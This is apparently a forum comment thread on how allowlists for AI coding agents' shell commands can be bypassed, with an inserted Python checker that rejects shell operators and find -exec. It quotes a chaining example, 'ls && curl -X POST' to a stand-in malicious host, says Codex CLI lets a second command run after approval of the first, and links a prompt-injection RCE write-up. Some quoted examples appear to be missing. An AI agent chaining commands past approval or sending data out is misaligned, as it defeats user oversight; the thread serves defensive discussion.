gruez 5 days ago
That's trickier than it sounds. find, for instance, has the -exec command, which allows arbitrary code to be executed. Build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like
is an easy target for command injection. Just to think of a few:
FergusArgyll 5 days ago
Yeah, this is CTF 101; see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command, but the same principles can be used for this).
diggan 4 days ago
I'm 99% sure Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.
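An added example, not written by any commenter in this thread, of the stricter check that gruez's and diggan's points call for: it tokenizes the command with Python's shlex so that `ls && curl ...` shows up as separate tokens, rejects shell operators, substitution and newlines, and denies the find -exec family. The allowlisted programs and the denied flag set are assumptions chosen for illustration, and the check does nothing about build tools or interpreters, which gruez rightly says cannot be made safe by an allowlist.

```python
import shlex

# Assumed allowlist and deny-list for illustration only.
ALLOWED = {"ls", "cat", "grep", "find"}
DENIED_FLAGS = {"find": {"-exec", "-execdir", "-ok", "-okdir"}}
SHELL_OPERATORS = set("();<>|&")


def is_allowed(command: str) -> tuple[bool, str]:
    """Return (allowed, reason). Only a single plain invocation of an
    allowlisted program, with no shell operators, passes."""
    # A newline separates commands in a shell but shlex treats it as
    # whitespace; substitution forms are never surfaced as operators either.
    # Reject all of them up front on the raw string.
    for bad in ("\n", "`", "$(", "${"):
        if bad in command:
            return False, f"contains {bad!r}"
    # punctuation_chars=True makes runs of ();<>|& their own tokens, so
    # "ls && curl" becomes ['ls', '&&', 'curl'] instead of opaque words.
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError as exc:  # e.g. unterminated quote
        return False, f"unparseable: {exc}"
    if not tokens:
        return False, "empty command"
    program = tokens[0].rsplit("/", 1)[-1]  # "/bin/ls" -> "ls"
    if program not in ALLOWED:
        return False, f"{program!r} is not allowlisted"
    for tok in tokens[1:]:
        if tok in DENIED_FLAGS.get(program, ()):
            return False, f"{program} {tok} executes arbitrary code"
    for tok in tokens:
        if set(tok) <= SHELL_OPERATORS:
            return False, f"shell operator {tok!r} composes a second command"
    return True, "ok"


if __name__ == "__main__":
    for cmd in ("ls -la", "ls && curl -X POST http://malicio.us",
                "find . -name '*.log' -exec rm {} +", "ls 'a;b'"):
        print(f"{cmd!r}: {is_allowed(cmd)}")
```

Quoted arguments such as `'a;b'` are kept as one token by shlex, so the operator check does not misfire on them.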
wunderwuzzi23 5 days ago
About that find command... Amazon Q Developer: Remote Code Execution with Prompt Injection https://embracethered.com/blog/posts/2025/amazon-q-developer...
grepfru_it 4 days ago
Well, a complete implementation is also using inotify(7), which would review all files that were modified.